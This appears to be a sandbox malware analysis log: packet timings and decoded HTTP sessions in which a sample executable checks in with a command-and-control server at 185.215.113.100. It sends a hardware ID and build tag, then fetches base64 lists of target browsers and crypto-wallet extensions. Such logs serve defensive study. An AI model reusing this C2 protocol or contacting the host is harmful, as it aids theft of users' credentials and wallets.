                                  Aug 30, 2024 00:48:12.907335043 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907340050 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907346010 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907356977 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907370090 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907371044 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907399893 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907428980 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907601118 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907613039 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907622099 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907632113 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907643080 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907645941 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907655001 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907666922 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907670975 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907676935 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907687902 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907689095 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907701015 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907711029 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907726049 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907754898 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907923937 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907934904 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.907965899 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.907989979 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908025980 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908121109 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908138990 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908150911 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908160925 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908162117 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908171892 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908174992 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908185005 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908186913 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908198118 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908206940 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908209085 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908220053 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908230066 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908235073 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908241034 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908252001 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908256054 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908265114 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908272982 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908277988 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908301115 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908328056 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908675909 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908688068 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908709049 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908715963 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908725977 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908731937 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908737898 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908749104 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908751011 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908760071 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908771038 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908771992 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908782005 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908790112 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908802032 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908813000 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908817053 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908826113 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908835888 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908839941 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908847094 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908847094 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908859968 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908870935 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908878088 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908881903 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908894062 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908902884 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908907890 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908919096 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908920050 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.908947945 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.908962965 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.909316063 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.909336090 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.909347057 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.909356117 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.909358025 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:12.909370899 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.909389973 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:12.909405947 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:13.461723089 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:13.461774111 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:13.468318939 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:13.468329906 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.295829058 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.295903921 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:14.377152920 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:14.382045031 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.625957012 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.625976086 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.625988007 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.626033068 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:14.626085997 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:14.628353119 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:14.633076906 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.902343035 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:14.902429104 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:14.917067051 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:14.924253941 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.014456034 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.014626026 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:16.014800072 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.014880896 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:16.320039988 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:16.328597069 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.582369089 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.582386971 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.582400084 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.582439899 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.582453966 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:16.582474947 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:16.582529068 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:16.592736959 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:16.599796057 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:17.389978886 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:17.390068054 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:22.395226002 CEST8049704185.215.113.100192.168.2.5
                                  Aug 30, 2024 00:48:22.395296097 CEST4970480192.168.2.5185.215.113.100
                                  Aug 30, 2024 00:48:22.410459042 CEST4970480192.168.2.5185.215.113.100
                                  • 185.215.113.100
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.100805320C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 30, 2024 00:47:58.690099955 CEST90OUTGET / HTTP/1.1
                                  Host: 185.215.113.100
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Aug 30, 2024 00:47:59.513787985 CEST203INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:47:59 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Aug 30, 2024 00:47:59.529089928 CEST413OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA
                                  Host: 185.215.113.100
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 43 44 31 34 35 35 38 39 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a
                                  Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"F7CD145589561166170430------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"leva------GHDHJEBFBFHJECAKFCAA--
                                  Aug 30, 2024 00:47:59.792609930 CEST407INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:47:59 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Vary: Accept-Encoding
                                  Content-Length: 180
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 4d 6a 63 7a 4d 47 46 6d 5a 6a 64 6c 4d 6d 55 34 4d 44 49 31 4e 7a 68 6d 4d 44 45 31 59 32 45 35 5a 6a 52 6c 5a 6a 41 34 4d 32 52 6b 5a 47 46 6b 59 6a 4e 69 59 6d 46 6d 5a 54 64 6c 4f 44 6c 6b 4e 57 51 34 4e 6d 5a 68 5a 44 45 77 5a 54 55 31 5a 6a 64 6a 4f 47 4d 7a 4d 7a 52 6c 5a 6a 67 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                  Data Ascii: MjczMGFmZjdlMmU4MDI1NzhmMDE1Y2E5ZjRlZjA4M2RkZGFkYjNiYmFmZTdlODlkNWQ4NmZhZDEwZTU1ZjdjOGMzMzRlZjg2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                  Aug 30, 2024 00:47:59.793852091 CEST470OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE
                                  Host: 185.215.113.100
                                  Content-Length: 268
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a
                                  Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="message"browsers------IECAFHDBGHJKFIDHJJJE--
                                  Aug 30, 2024 00:48:00.041354895 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:47:59 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Vary: Accept-Encoding
                                  Content-Length: 1520
                                  Keep-Alive: timeout=5, max=98
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                  Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                  Aug 30, 2024 00:48:00.041373014 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                  Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                  Aug 30, 2024 00:48:00.042754889 CEST469OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF
                                  Host: 185.215.113.100
                                  Content-Length: 267
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a
                                  Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"plugins------FCAAEHJDBKJJKFHJEBKF--
                                  Aug 30, 2024 00:48:00.291481018 CEST1236INHTTP/1.1 200 OK
                                  Date: Thu, 29 Aug 2024 22:48:00 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Vary: Accept-Encoding
                                  Content-Length: 7116
                                  Keep-Alive: timeout=5, max=97
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                  Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                  Aug 30, 2024 00:48:00.291528940 CEST164INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                  Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
                                  Aug 30, 2024 00:48:00.291538954 CEST1236INData Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47
                                  Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
